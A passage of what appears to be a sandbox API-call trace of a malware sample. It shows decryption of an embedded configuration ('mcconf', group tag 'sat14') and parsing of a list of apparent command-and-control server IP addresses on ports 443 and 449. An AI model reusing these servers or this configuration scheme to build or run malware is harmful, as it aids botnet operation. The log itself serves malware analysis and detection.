pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31cbb0, pdwDataLen=0x1ee448) returned 1 [0262.440] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.440] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.440] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.441] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.441] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xc60, dwFlags=0x0) returned 1 [0262.441] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.441] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31cbe0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31cbe0, pdwDataLen=0x1ee448) returned 1 [0262.441] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.441] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.441] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.442] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.442] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xc80, dwFlags=0x0) returned 1 [0262.442] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.442] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31cc10, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31cc10, pdwDataLen=0x1ee448) returned 1 [0262.442] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.442] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.442] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.443] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.443] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xca0, dwFlags=0x0) returned 1 [0262.443] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.443] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31cc40, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31cc40, pdwDataLen=0x1ee448) returned 1 [0262.443] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.443] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.443] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.443] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.443] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xcc0, dwFlags=0x0) returned 1 [0262.443] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.446] CryptImportKey (in: hProv=0x2c50e0, pbData=0x1ee438, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x1ee428 | out: phKey=0x1ee428*=0x2a5c40) returned 1 [0262.446] CryptSetKeyParam (hKey=0x2a5c40, dwParam=0x4, pbData=0x1ee424*=0x1, dwFlags=0x0) returned 1 [0262.447] CryptSetKeyParam (hKey=0x2a5c40, dwParam=0x1, pbData=0x31d150, dwFlags=0x0) returned 1 [0262.447] CryptDecrypt (in: hKey=0x2a5c40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31d1d0, pdwDataLen=0x1ee420 | out: pbData=0x31d1d0, pdwDataLen=0x1ee420) returned 1 [0262.448] CryptDestroyKey (hKey=0x2a5c40) returned 1 [0262.448] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.448] GetVersion () returned 0x1db10106 [0262.448] CryptAcquireContextW (in: phProv=0x1ee300, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee300*=0x2c50e0) returned 1 [0262.449] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800d, hKey=0x0, dwFlags=0x0, phHash=0x1ee2f8 | out: phHash=0x1ee2f8) returned 1 [0262.450] CryptHashData (hHash=0x2a5c40, pbData=0x31d1d0, dwDataLen=0x4db, dwFlags=0x0) returned 1 [0262.450] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee348, pdwDataLen=0x1ee2f0, dwFlags=0x0 | out: pbData=0x1ee348, pdwDataLen=0x1ee2f0) returned 1 [0262.458] DOMDocument30:IXMLDOMDocument:loadXML (in: This=0x17a8440, bstrXML="1000315sat14104.168.58.38:44324.247.181.155:44924.247.182.39:449107.174.34.202:44324.247.182.29:44924.247.182.179:44924.247.182.179:449198.46.131.164:44374.132.135.120:449198.46.160.217:44371.94.101.25:44324.247.182.225:449192.3.52.107:44374.140.160.33:44965.31.241.133:449140.190.54.187:44924.247.181.226:449108.160.196.130:44989.46.222.239:44324.247.182.174:449108.174.60.161:44375.108.123.165:44972.189.124.41:44924.247.182.225:449105.27.171.234:449182.253.20.66:449172.222.97.179:44972.241.62.188:449198.46.198.241:443199.227.126.250:44997.87.172.0:44924.247.182.174:44994.232.20.113:443190.145.74.84:44947.49.168.50:44364.128.175.37:44924.227.222.4:449", isSuccessful=0x1ee500 | out: isSuccessful=0x1ee500*=0xffff) returned 0x0 [0262.460] DOMDocument30:IXMLDOMDocument:get_documentElement (in: This=0x17a8440, DOMElement=0x1ee4e8 | out: DOMElement=0x1ee4e8*=0x17abcf0) returned 0x0 [0262.461] IXMLDOMNode:get_baseName (in: This=0x17abcf0, nameString=0x1ee4d8 | out: nameString=0x1ee4d8*="mcconf") returned 0x0 [0262.462] IXMLDOMNode:get_firstChild (in: This=0x17abcf0, firstChild=0x1ee4d0 | out: firstChild=0x1ee4d0*=0x17abd70) returned 0x0 [0262.462] IXMLDOMNode:get_baseName (in: This=0x17abd70, nameString=0x1ee4d8 | out: nameString=0x1ee4d8*="ver") returned 0x0 [0262.463] IXMLDOMNode:get_text (in: This=0x17abd70, text=0x1ee4e0 | out: text=0x1ee4e0*="1000315") returned 0x0 [0262.463] _wtoi (_String="1000315") returned 1000315 [0262.463] IXMLDOMNode:get_nextSibling (in: This=0x17abd70, nextSibling=0x1ee480 | out: nextSibling=0x1ee480*=0x17abde0) returned 0x0 [0262.463] IUnknown:Release (This=0x17abd70) returned 0x0 [0262.463] IXMLDOMNode:get_baseName (in: This=0x17abde0, nameString=0x1ee4d8 | out: nameString=0x1ee4d8*="gtag") returned 0x0 [0262.463] IXMLDOMNode:get_text (in: This=0x17abde0, text=0x1ee4e0 | out: text=0x1ee4e0*="sat14") returned 0x0 [0262.463] IXMLDOMNode:get_nextSibling (in: This=0x17abde0, nextSibling=0x1ee480 | out: nextSibling=0x1ee480*=0x17abd70) returned 0x0 [0262.463] IUnknown:Release (This=0x17abde0) returned 0x0 [0262.463] IXMLDOMNode:get_baseName (in: This=0x17abd70, nameString=0x1ee4d8 | out: nameString=0x1ee4d8*="servs") returned 0x0 [0262.463] IXMLDOMNode:get_text (in: This=0x17abd70, text=0x1ee4e0 | out: text=0x1ee4e0*="104.168.58.38:44324.247.181.155:44924.247.182.39:449107.174.34.202:44324.247.182.29:44924.247.182.179:44924.247.182.179:449198.46.131.164:44374.132.135.120:449198.46.160.217:44371.94.101.25:44324.247.182.225:449192.3.52.107:44374.140.160.33:44965.31.241.133:449140.190.54.187:44924.247.181.226:449108.160.196.130:44989.46.222.239:44324.247.182.174:449108.174.60.161:44375.108.123.165:44972.189.124.41:44924.247.182.225:449105.27.171.234:449182.253.20.66:449172.222.97.179:44972.241.62.188:449198.46.198.241:443199.227.126.250:44997.87.172.0:44924.247.182.174:44994.232.20.113:443190.145.74.84:44947.49.168.50:44364.128.175.37:44924.227.222.4:449") returned 0x0 [0262.464] IXMLDOMNode:hasChildNodes (in: This=0x17abd70, hasChild=0x1ee468 | out: hasChild=0x1ee468*=0xffff) returned 0x0 [0262.464] IXMLDOMNode:get_childNodes (in: This=0x17abd70, childList=0x1ee320 | out: childList=0x1ee320*=0x17a8aa0) returned 0x0 [0262.464] IXMLDOMNodeList:get_length (in: This=0x17a8aa0, listLength=0x1ee470 | out: listLength=0x1ee470*=37) returned 0x0 [0262.464] IXMLDOMNodeList:get_item (in: This=0x17a8aa0, index=0, listItem=0x1ee300 | out: listItem=0x1ee300*=0x17abde0) returned 0x0 [0262.464] IXMLDOMNode:get_baseName (in: This=0x17abde0, nameString=0x1ee308 | out: nameString=0x1ee308*="srv") returned 0x0 [0262.464] lstrcmpiW (lpString1="srv", lpString2="srv") returned 0 [0262.464] IXMLDOMNode:get_text (in: This=0x17abde0, text=0x1ee310 | out: text=0x1ee310*="104.168.58.38:443") returned 0x0 [0262.465] StrStrIW (lpFirst="104.168.58.38:443", lpSrch=":") returned=":443" [0262.465] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0 [0262.465] IUnknown:Release (This=0x17abde0) returned 0x0 [0262.466] IXMLDOMNodeList:get_item (in: This=0x17a8aa0, index=1, listItem=0x1ee300 | out: listItem=0x1ee300*=0x17abde0) returned 0x0 [0262.466] IXMLDOMNode:get_baseName (in: This=0x17abde0, nameString=0x1ee308 | out: nameString=0x1ee308*="srv") returned 0x0 [0262.466] lstrcmpiW (lpString1="srv", lpString2="srv") returned 0 [0262.466] IXMLDOMNode:get_text (in: This=0x17abde0, text=0x1ee310 | out: text=0x1ee310*="24.247.181.155:449") returned 0x0 [0262.466] StrStrIW (lpFirst="24.247.181.155:449", lpSrch=":") returned=":449" [0262.466] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0 [0262.466] IUnknown:Release (This=0x17abde0) returned 0x0 [0262.466] IXMLDOMNodeList:get_item (in: This=0x17a8aa0, index=2, listItem=0x1ee300 | out: listItem=0x1ee300*=0x17abde0) returned 0x0 [0262.467] IXMLDOMNode:get_baseName (in: This=0x17abde0, nameString=0x1ee308 | out: nameString=0x1ee308*="srv") returned 0x0 [0262.467] lstrcmpiW (lpString1="srv", lpString2="srv") returned 0 [0262.467] IXMLDOMNode:get_text (in: This=0x17abde0, text=0x1ee310 | out: text=0x1ee310*="24.247.182.39:449") returned 0x0 [0262.467] StrStrIW (lpFirst="24.247.182.39:449", lpSrch=":") returned=":449" [0262.467] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0 [0262.467] IUnknown:Release (This=0x17abde0) returned 0x0 [0262.467] IXMLDOMNodeList:get_item (in: This=0x17a8aa0, index=3, listItem=0x1ee300 | out: listItem=0x1ee300*=0x17abde0) returned 0x0 [0262.468] IXMLDOMNode:get_baseName (in: This=0x17abde0, nameString=0x1ee308 | out: nameString=0x1ee308*="srv") returned 0x0 [0262.468] lstrcmpiW (lpString1="srv", lpString2="srv") returned 0 [0262.468] IXMLDOMNode:get_text (in: This=0x17abde0, text=0x1ee310 | out: text=0x1ee310*="107.174.34.202:443") returned 0x0 [0262.468] StrStrIW (lpFirst="107.174.34.202:443", lpSrch=":") returned=":443" [0262.468] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0 [0262.468] IUnknown:Release (This=0x17abde0) returned 0x0 [0262.468] IXMLDOMNodeList:get_item (in: This=0x17a8aa0, index=4, listItem=0x1ee300 | out: listItem=0x1ee300*=0x17abde0) returned 0x0 [0262.469] IXMLDOMNode:get_baseName (in: This=0x17abde0, nameString=0x1ee308 | out: nameString=0x1ee308*="srv") returned 0x0 [0262.469] lstrcmpiW (lpString1="srv", lpString2="srv") returned 0 [0262.469] IXMLDOMNode:get_text (in: This=0x17abde0, text=0x1ee310 | out: text=0x1ee310*="24.247.182.29:449") returned 0x0 [0262.469] StrStrIW (lpFirst="24.247.182.29:449", lpSrch=":") returned=":449" [0262.469] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0 [0262.469] IUnknown:Release (This=0x17abde0) returned 0x0 [0262.469] IXMLDOMNodeList:get_item (in: This=0x17a8aa0, index=5, listItem=0x1ee300 | out: listItem=0x1ee300*=0x17abde0) returned 0x0 [0262.470] IXMLDOMNode:get_baseName (in: This=0x17abde0, nameString=0x1ee308 | out: nameString=0x1ee308*="srv") returned 0x0 [0262.470] lstrcmpiW (lpString1="srv", lpString2="srv") returned 0 [0262.470] IXMLDOMNode:get_text (in: This=0x17abde0, text=0x1ee310 | out: text=0x1ee310*="24.247.182.179:449") returned 0x0 [0262.470] StrStrIW (lpFirst="24.247.182.179:449", lpSrch=":") returned=":449" [0262.470] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0 [0262.470] IUnknown:Release (This=0x17abde0) returned 0x0 [0262.470] IXMLDOMNodeList:get_item (in: This=0x17a8aa0, index=6, listItem=0x1ee300 | out: listItem=0x1ee300*=0x17abde0) returned 0x0 [0262.471] IXMLDOMNode:get_baseName (in: This=0x17abde0, nameString=0x1ee308 | out: nameString=0x1ee308*="srv") returned 0x0 [0262.471] lstrcmpiW (lpString1="srv", lpString2="srv") returned 0 [0262.471] IXMLDOMNode:get_text (in: This=0x17abde0, text=0x1ee310 | out: text=0x1ee310*="24.247.182.179:449") returned 0x0 [0262.471] StrStrIW (lpFirst="24.247.182.179:449", lpSrch=":") returned=":449" [0262.471] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0 [0262.471] IUnknown:Release (This=0x17abde0) returned 0x0 [0262.471] IXMLDOMNodeList:get_item (in: This=0x17a8aa0, index=7, listItem=0x1ee300 | out: listItem=0x1ee300*=0x17abde0) returned 0x0 [0262.472] IXMLDOMNode:get_baseName (in: This=0x17abde0, nameString=0x1ee308 | out: nameString=0x1ee308*="srv") returned 0x0 [0262.472] lstrcmpiW (lpString1="srv", lpString2="srv") returned 0 [0262.472] IXMLDOMNode:get_text (in: This=0x17abde0, text=0x1ee310 | out: text=0x1ee310*="198.46.131.164:443") returned 0x0 [0262.472] StrStrIW (lpFirst="198.46.131.164:443", lpSrch=":") returned=":443" [0262.472] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0 [0262.472] IUnknown:Release (This=0x17abde0) returned 0x0 [0262.472] IXMLDOMNodeList:get_item (in: This=0x17a8aa0, index=8, listItem=0x1ee300 | out: listItem=0x1ee300*=0x17abde0) returned 0x0 [0262.473] IXMLDOMNode:get_baseName (in: This=0x17abde0, nameString=0x1ee308 | out: nameString=0x1ee308*="srv") returned 0x0 [0262.473] lstrcmpiW (lpString1="srv", lpString2="srv") returned 0 [0262.473] IXMLDOMNode:get_text (in: This=0x17abde0, text=0x1ee310 | out: text=0x1ee310*="74.132.135.120:449") returned 0x0 [0262.473] StrStrIW (lpFirst="74.132.135.120:449", lpSrch=":") returned=":449" [0262.473] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0 [0262.473] IUnknown:Release (This=0x17abde0) returned 0x0 [0262.473] IXMLDOMNodeList:get_item (in: This=0x17a8aa0, index=9, listItem=0x1ee300 | out: listItem=0x1ee300*=0x17abde0) returned 0x0 [0262.474] IXMLDOMNode:get_baseName (in: This=0x17abde0, nameString=0x1ee308 | out: nameString=0x1ee308*="srv") returned 0x0 [0262.474] lstrcmpiW (lpString1="srv", lpString2="srv") returned 0 [0262.474] IXMLDOMNode:get_text (in: This=0x17abde0, text=0x1ee310 | out: text=0x1ee310*="198.46.160.217:443") returned 0x0 [0262.474] StrStrIW (lpFirst="198.46.160.217:443", lpSrch=":") returned=":443" [0262.474] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0 [0262.474] IUnknown:Release (This=0x17abde0) returned 0x0 [0262.474] IXMLDOMNodeList:get_item (in: This=0x17a8aa0, index=10, listItem=0x1ee300 | out: listItem=0x1ee300*=0x17abde0) returned 0x0 [0262.475] IXMLDOMNode:get_baseName (in: This=0x17abde0, nameString=0x1ee308 | out: nameString=0x1ee308*="srv") returned 0x0 [0262.475] lstrcmpiW (lpString1="srv", lpString2="srv") returned 0 [0262.475] IXMLDOMNode:get_text (in: This=0x17abde0, text=0x1ee310 | out: text=0x1ee310*="71.94.101.25:443") returned 0x0 [0262.475] StrStrIW (lpFirst="71.94.101.25:443", lpSrch=":") returned=":443" [0262.475] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0 [0262.476] IUnknown:Release (This=0x17abde0) returned 0x0 [0262.476] IXMLDOMNodeList:get_item (in: This=0x17a8aa0, index=11, listItem=0x1ee300 | out: listItem=0x1ee300*=0x17abde0) returned 0x0 [0262.476] IXMLDOMNode:get_baseName (in: This=0x17abde0, nameString=0x1ee308 | out: nameString=0x1ee308*="srv") returned 0x0 [0262.476] lstrcmpiW (lpString1="srv", lpString2="srv") returned 0 [0262.476] IXMLDOMNode:get_text (in: This=0x17abde0, text=0x1ee310 | out: text=0x1ee310*="24.247.182.225:449") returned 0x0 [0262.476] StrStrIW (lpFirst="24.247.182.225:449", lpSrch=":") returned=":449" [0262.476] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0 [0262.477] IUnknown:Release (This=0x17abde0) returned 0x0 [0262.477] IXMLDOMNodeList:get_item (in: This=0x17a8aa0, index=12, listItem=0x1ee300 | out: listItem=0x1ee300*=0x17abde0) returned 0x0 [0262.477] IXMLDOMNode:get_baseName (in: This=0x17abde0, nameString=0x1ee308 | out: nameString=0x1ee308*="srv") returned 0x0 [0262.477] lstrcmpiW (lpString1="srv", lpString2="srv") returned 0 [0262.477] IXMLDOMNode:get_text (in: This=0x17abde0, text=0x1ee310 | out: text=0x1ee310*="192.3.52.107:443") returned 0x0 [0262.477] StrStrIW (lpFirst="192.3.52.107:443", lpSrch=":") returned=":443" [0262.477] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0 [0262.478] IUnknown:Release (This=0x17abde0) returned 0x0 [0262.478] IXMLDOMNodeList:get_item (in: This=0x17a8aa0, index=13, listItem=0x1ee300 | out: listItem=0x1ee300*=0x17abde0) returned 0x0 [0262.478] IXMLDOMNode:get_baseName (in: This=0x17abde0, nameString=0x1ee308 | out: nameString=0x1ee308*="srv") returned 0x0 [0262.478] lstrcmpiW (lpString1="srv", lpString2="srv") returned 0 [0262.478] IXMLDOMNode:get_text (in: This=0x17abde0, text=0x1ee310 | out: text=0x1ee310*="74.140.160.33:449") returned 0x0 [0262.478] StrStrIW (lpFirst="74.140.160.33:449", lpSrch=":") returned=":449" [0262.478] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0 [0262.479] IUnknown:Release (This=0x17abde0) returned 0x0 [0262.479] IXMLDOMNodeList:get_item (in: This=0x17a8aa0, index=14, listItem=0x1ee300 | out: listItem=0x1ee300*=0x17abde0) returned 0x0 [0262.479] IXMLDOMNode:get_baseName (in: This=0x17abde0, nameString=0x1ee308 | out: nameString=0x1ee308*="srv") returned 0x0 [0262.479] lstrcmpiW (lpString1="srv", lpString2="srv") returned 0 [0262.479] IXMLDOMNode:get_text (in: This=0x17abde0, text=0x1ee310 | out: text=0x1ee310*="65.31.241.133:449") returned 0x0 [0262.479] StrStrIW (lpFirst="65.31.241.133:449", lpSrch=":") returned=":449" [0262.479] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0 [0262.480] IUnknown:Release (This=0x17abde0) returned 0x0 [0262.480] IXMLDOMNodeList:get_item (in: This=0x17a8aa0, index=15, listItem=0x1ee300 | out: listItem=0x1ee300*=0x17abde0) returned 0x0 [0262.480] IXMLDOMNode:get_baseName (in: This=0x17abde0, nameString=0x1ee308 | out: nameString=0x1ee308*="srv") returned 0x0 [0262.480] lstrcmpiW (lpString1="srv", lpString2="srv") returned 0 [0262.480] IXMLDOMNode:get_text (in: This=0x17abde0, text=0x1ee310 | out: text=0x1ee310*="140.190.54.187:449") returned 0x0 [0262.480] StrStrIW (lpFirst="140.190.54.187:449", lpSrch=":") returned=":449" [0262.480] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0 [0262.480] IUnknown:Release (This=0x17abde0) returned 0x0 [0262.481] IXMLDOMNodeList:get_item (in: This=0x17a8aa0, index=16, listItem=0x1ee300 | out: listItem=0x1ee300*=0x17abde0) returned 0x0 [0262.481] IXMLDOMNode:get_baseName (in: This=0x17abde0, nameString=0x1ee308 | out: nameString=0x1ee308*="srv") returned 0x0 [0262.481] lstrcmpiW (lpString1="srv", lpString2="srv") returned 0 [0262.481] IXMLDOMNode:get_text (in: This=0x17abde0, text=0x1ee310 | out: text=0x1ee310*="24.247.181.226:449") returned 0x0 [0262.481] StrStrIW (lpFirst="24.247.181.226:449", lpSrch=":") returned=":449" [0262.481] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0 [0262.481] IUnknown:Release (This=0x17abde0) returned 0x0 [0262.482] IXMLDOMNodeList:get_item (in: This=0x17a8aa0, index=17, listItem=0x1ee300 | out: listItem=0x1ee300*=0x17abde0) returned 0x0 [0262.482] IXMLDOMNode:get_baseName (in: This=0x17abde0, nameString=0x1ee308 | out: nameString=0x1ee308*="srv") returned 0x0 [0262.482] lstrcmpiW (lpString1="srv", lpString2="srv") returned 0 [0262.482] IXMLDOMNode:get_text (in: This=0x17abde0, text=0x1ee310 | out: text=0x1ee310*="108.160.196.130:449") returned 0x0 [0262.482] StrStrIW (lpFirst="108.160.196.130:449", lpSrch=":") returned=":449" [0262.482] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0 [0262.482] IUnknown:Release (This=0x17abde0) returned 0x0 [0262.482] IXMLDOMNodeList:get_item (in: This=0x17a8aa0, index=18, listItem=0x1ee300 | out: listItem=0x1ee300*=0x17abde0) returned 0x0 [0262.483] IXMLDOMNode:get_baseName (in: This=0x17abde0, nameString=0x1ee308 | out: nameString=0x1ee308*="srv") returned 0x0 [0262.483] lstrcmpiW (lpString1="srv", lpString2="srv") returned 0 [0262.483] IXMLDOMNode:get_text (in: This=0x17abde0, text=0x1ee310 | out: text=0x1ee310*="89.46.222.239:443") returned 0x0 [0262.483] StrStrIW (lpFirst="89.46.222.239:443", lpSrch=":") returned=":443" [0262.483] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0 [0262.484] IUnknown:Release (This=0x17abde0) returned 0x0 [0262.484] IXMLDOMNodeList:get_item (in: This=0x17a8aa0, index=19, listItem=0x1ee300 | out: listItem=0x1ee300*=0x17abde0) returned 0x0 [0262.484] IXMLDOMNode:get_baseName (in: This=0x17abde0, nameString=0x1ee308 | out: nameString=0x1ee308*="srv") returned 0x0 [0262.484] lstrcmpiW (lpString1="srv", lpString2="srv") returned 0 [0262.484] IXMLDOMNode:get_text (in: This=0x17abde0, text=0x1ee310 | out: text=0x1ee310*="24.247.182.174:449") returned 0x0 [0262.484] StrStrIW (lpFirst="24.247.182.174:449", lpSrch=":") returned=":449" [0262.484] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0 [0262.485] IUnknown:Release (This=0x17abde0) returned 0x0 [0262.485] IXMLDOMNodeList:get_item (in: This=0x17a8aa0, index=20, listItem=0x1ee300 | out: listItem=0x1ee300*=0x17abde0) returned 0x0 [0262.485] IXMLDOMNode:get_baseName (in: This=0x17abde0, nameString=0x1ee308 | out: nameString=0x1ee308*="srv") returned 0x0 [0262.485] lstrcmpiW (lpString1="srv", lpString2="srv") returned 0 [0262.485] IXMLDOMNode:get_text (in: This=0x17abde0, text=0x1ee310 | out: text=0x1ee310*="108.174.60.161:443") returned 0x0 [0262.485] StrStrIW (lpFirst="108.174.60.161:443", lpSrch=":") returned=":443" [0262.485] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0 [0262.486] IUnknown:Release (This=0x17abde0) returned 0x0 [0262.486] IXMLDOMNodeList:get_item (in: This=0x17a8aa0, index=21, listItem=0x1ee300 | out: listItem=0x1ee300*=0x17abde0) returned 0x0 [0262.486] IXMLDOMNode:get_baseName (in: This=0x17abde0, nameString=0x1ee308 | out: nameString=0x1ee308*="srv") returned 0x0 [0262.486] lstrcmpiW (lpString1="srv", lpString2="srv") returned 0 [0262.486] IXMLDOMNode:get_text (in: This=0x17abde0, text=0x1ee310 | out: text=0x1ee310*="75.108.123.165:449") returned 0x0 [0262.486] StrStrIW (lpFirst="75.108.123.165:449", lpSrch=":") returned=":449" [0262.486] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0 [0262.487] IUnknown:Release (This=0x17abde0) returned 0x0 [0262.487] IXMLDOMNodeList:get_item (in: This=0x17a8aa0, index=22, listItem=0x1ee300 | out: listItem=0x1ee300*=0x17abde0) returned 0x0 [0262.487] IXMLDOMNode:get_baseName (in: This=0x17abde0, nameString=0x1ee308 | out: nameString=0x1ee308*="srv") returned 0x0 [0262.487] lstrcmpiW (lpString1="srv", lpString2="srv") returned 0 [0262.487] IXMLDOMNode:get_text (in: This=0x17abde0, text=0x1ee310 | out: text=0x1ee310*="72.189.124.41:449") returned 0x0 [0262.487] StrStrIW (lpFirst="72.189.124.41:449", lpSrch=":") returned=":449" [0262.487] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0 [0262.487] IUnknown:Release (This=0x17abde0) returned 0x0 [0262.488] IXMLDOMNodeList:get_item (in: This=0x17a8aa0, index=23, listItem=0x1ee300 | out: listItem=0x1ee300*=0x17abde0) returned 0x0 [0262.488] IXMLDOMNode:get_baseName (in: This=0x17abde0, nameString=0x1ee308 | out: nameString=0x1ee308*="srv") returned 0x0 [0262.488] lstrcmpiW (lpString1="srv", lpString2="srv") returned 0 [0262.488] IXMLDOMNode:get_text (in: This=0x17abde0, text=0x1ee310 | out: text=0x1ee310*="24.247.182.225:449") returned 0x0 [0262.488] StrStrIW (lpFirst="24.247.182.225:449", lpSrch=":") returned=":449" [0262.488] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0 [0262.488] IUnknown:Release (This=0x17abde0) returned 0x0 [0262.489] IXMLDOMNodeList:get_item (in: This=0x17a8aa0, index=24, listItem=0x1ee300 | out: listItem=0x1ee300*=0x17abde0) returned 0x0 [0262.489] IXMLDOMNode:get_baseName (in: This=0x17abde0, nameString=0x1ee308 | out: nameString=0x1ee308*="srv") returned 0x0 [0262.489] lstrcmpiW (lpString1="srv", lpString2="srv") returned 0 [0262.489] IXMLDOMNode:get_text (in: This=0x17abde0, text=0x1ee310 | out: text=0x1ee310*="105.27.171.234:449") returned 0x0 [0262.489] StrStrIW (lpFirst="105.27.171.234:449", lpSrch=":") returned=":449" [0262.489] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0 [0262.489] IUnknown:Release (This=0x17abde0) returned 0x0 [0262.489] IXMLDOMNodeList:get_item (in: This=0x17a8aa0, index=25, listItem=0x1ee300 | out: listItem=0x1ee300*=0x17abde0) returned 0x0 [0262.490] IXMLDOMNode:get_baseName (in: This=0x17abde0, nameString=0x1ee308 | out: nameString=0x1ee308*="srv") returned 0x0 [0262.490] lstrcmpiW (lpString1="srv", lpString2="srv") returned 0 [0262.490] IXMLDOMNode:get_text (in: This=0x17abde0, text=0x1ee310 | out: text=0x1ee310*="182.253.20.66:449") returned 0x0 [0262.490] StrStrIW (lpFirst="182.253.20.66:449", lpSrch=":") returned=":449" [0262.490] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0 [0262.490] IUnknown:Release (This=0x17abde0) returned 0x0 [0262.490] IXMLDOMNodeList:get_item (in: This=0x17a8aa0, index=26, listItem=0x1ee300 | out: listItem=0x1ee300*=0x17abde0) returned 0x0 [0262.490] IXMLDOMNode:get_baseName (in: This=0x17abde0, nameString=0x1ee308 | out: nameString=0x1ee308*="srv") returned 0x0 [0262.490] lstrcmpiW (lpString1="srv", lpString2="srv") returned 0 [0262.491] IXMLDOMNode:get_text (in: This=0x17abde0, text=0x1ee310 | out: text=0x1ee310*="172.222.97.179:449") returned 0x0 [0262.491] StrStrIW (lpFirst="172.222.97.179:449", lpSrch=":") returned=":449" [0262.491] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0 [0262.491] IUnknown:Release (This=0x17abde0) returned 0x0 [0262.491] IXMLDOMNodeList:get_item (in: This=0x17a8aa0, index=27, listItem=0x1ee300 | out: listItem=0x1ee300*=0x17abde0) returned 0x0 [0262.491] IXMLDOMNode:get_baseName (in: This=0x17abde0, nameString=0x1ee308 | out: nameString=0x1ee308*="srv") returned 0x0 [0262.491] lstrcmpiW (lpString1="srv", lpString2="srv") returned 0 [0262.491] IXMLDOMNode:get_text (in: This=0x17abde0, text=0x1ee310 | out: text=0x1ee310*="72.241.62.188:449") returned 0x0 [0262.492] StrStrIW (lpFirst="72.241.62.188:449", lpSrch=":") returned=":449" 